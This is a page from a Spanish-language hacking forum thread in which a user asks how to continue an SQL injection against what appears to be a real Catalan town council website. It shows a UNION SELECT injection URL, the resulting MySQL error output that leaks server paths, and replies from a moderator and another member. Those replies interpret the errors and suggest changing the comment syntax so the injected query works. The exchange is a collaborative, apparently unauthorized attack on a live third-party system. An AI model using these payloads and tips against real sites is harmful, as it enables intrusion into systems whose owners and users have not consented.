elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  Ayuda como seguir con SQL Inyection
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 [2] 3 Ir Abajo Respuesta Imprimir
Autor Tema: Ayuda como seguir con SQL Inyection  (Leído 7,760 veces)
nuevaorden

Desconectado Desconectado

Mensajes: 27


Ver Perfil
Re: Ayuda como seguir con SQL Inyection
« Respuesta #10 en: 22 Marzo 2010, 21:28 pm »

mmmmmmm en el fichero rss.php?

http://www.*******.info/rss.php?noticies=2%20union%20select%20user%28%29,2,3%20--bisbal@localhost



Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/usuaris/bisbal/php/categoria.php on line 127

Warning: Cannot modify header information - headers already sent by (output started at /home/usuaris/bisbal/php/categoria.php:126) in /home/usuaris/bisbal/rss.php on line 27

Warning: Cannot modify header information - headers already sent by (output started at /home/usuaris/bisbal/php/categoria.php:126) in /home/usuaris/bisbal/php/rss10.php on line 77
http://www.******.cat Les últimes notícies de l'Ajuntament http://www.******.cat/index.php?noticies=2&codi=376 PLE ORDINARI DEL 26 DE GENER DE 2010  http://www.********.cat/index.php?noticies=2&codi=374 PLE EXTRAORDINARI DEL DIA 21 DE GENER DE 2010 http://www.******.cat/index.php?noticies=2&codi=364 PLE ORDINARI DEL 27 DE GENER DE 2009 http://www.******.cat/index.php?noticies=2&codi=363 PLE ORDINARI DEL 30 DE JUNY DE 2009  http://www.*********.cat/index.php?noticies=2&codi=361 PLE ORDINARI DEL DIA 22 DE DESEMBRE DE 2009
En línea

WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.605


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: Ayuda como seguir con SQL Inyection
« Respuesta #11 en: 22 Marzo 2010, 21:36 pm »

jajajaja espero que no sea el bisbal que yo conozco o vas a terminar igual que t1z4k jajaja
En línea

nuevaorden

Desconectado Desconectado

Mensajes: 27


Ver Perfil
Re: Ayuda como seguir con SQL Inyection
« Respuesta #12 en: 22 Marzo 2010, 21:42 pm »

JAJAJAJAJAJ no no lo es jejejejejejejeje  mmmm no hay maneras buffff.....
En línea

WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.605


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: Ayuda como seguir con SQL Inyection
« Respuesta #13 en: 22 Marzo 2010, 21:43 pm »

home/usuaris/bisbal/templates_c/contingut.tpl
ese templates_c me recuerda a un post que está mas abajo, me da la impresion de que es el mismo sistema pero estoy inseguro
En línea

nuevaorden

Desconectado Desconectado

Mensajes: 27


Ver Perfil
Re: Ayuda como seguir con SQL Inyection
« Respuesta #14 en: 22 Marzo 2010, 21:50 pm »

Smarty version 2.5.0   mmmmm
En línea

WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.605


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: Ayuda como seguir con SQL Inyection
« Respuesta #15 en: 22 Marzo 2010, 21:53 pm »

si tratas de hacer una query corrupta te escribe la query pero si la query no es corrupta pero aun así da error entonces sale mysql_error(), en ese caso se puede deducir que está utilizando mysqli o alguna función que verifica la query antes de ser procesada
En línea

nuevaorden

Desconectado Desconectado

Mensajes: 27


Ver Perfil
Re: Ayuda como seguir con SQL Inyection
« Respuesta #16 en: 22 Marzo 2010, 21:55 pm »

Si eso me he fijado, estoy mirando el cms smarty 2.5.0 en google....
En línea

nuevaorden

Desconectado Desconectado

Mensajes: 27


Ver Perfil
Re: Ayuda como seguir con SQL Inyection
« Respuesta #17 en: 22 Marzo 2010, 21:59 pm »

que post dices que es similar?????

Gracias
En línea

nuevaorden

Desconectado Desconectado

Mensajes: 27


Ver Perfil
Re: Ayuda como seguir con SQL Inyection
« Respuesta #18 en: 22 Marzo 2010, 22:07 pm »

Usa mysqli el cms bufffff mas dificil !!!!
En línea

tragantras


Desconectado Desconectado

Mensajes: 465


Ver Perfil
Re: Ayuda como seguir con SQL Inyection
« Respuesta #19 en: 22 Marzo 2010, 22:31 pm »

No s'ha pogut llegir select * from pdfs where idarticle=-1 order by 6/* and categoria=1 order by codi asc

mmmmmm


prueba a poner en vez de
Código:
/*
 
Código:
--
porque parece que no se hace "el comentario" de la query siguiente
En línea

Colaboraciones:
1 2
Páginas: 1 [2] 3 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Como seguir en Python
Scripting
Fyrox 1 2,087 Último mensaje 28 Septiembre 2011, 04:05 am
por Novlucker
Consejo de que seguir estudiando...(Ayuda)
.NET (C#, VB.NET, ASP)
Senior++ 4 4,191 Último mensaje 31 Marzo 2012, 09:57 am
por Senior++
¿como me recomiendan seguir? (siguiendo la ruta de validacion de un .exe)
Ingeniería Inversa
tomasjrl 4 2,842 Último mensaje 2 Octubre 2014, 05:52 am
por tomasjrl
¿Como seguir con Java?
Programación General
JVulture 2 2,019 Último mensaje 3 Noviembre 2015, 11:18 am
por WhiteDeMoN
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines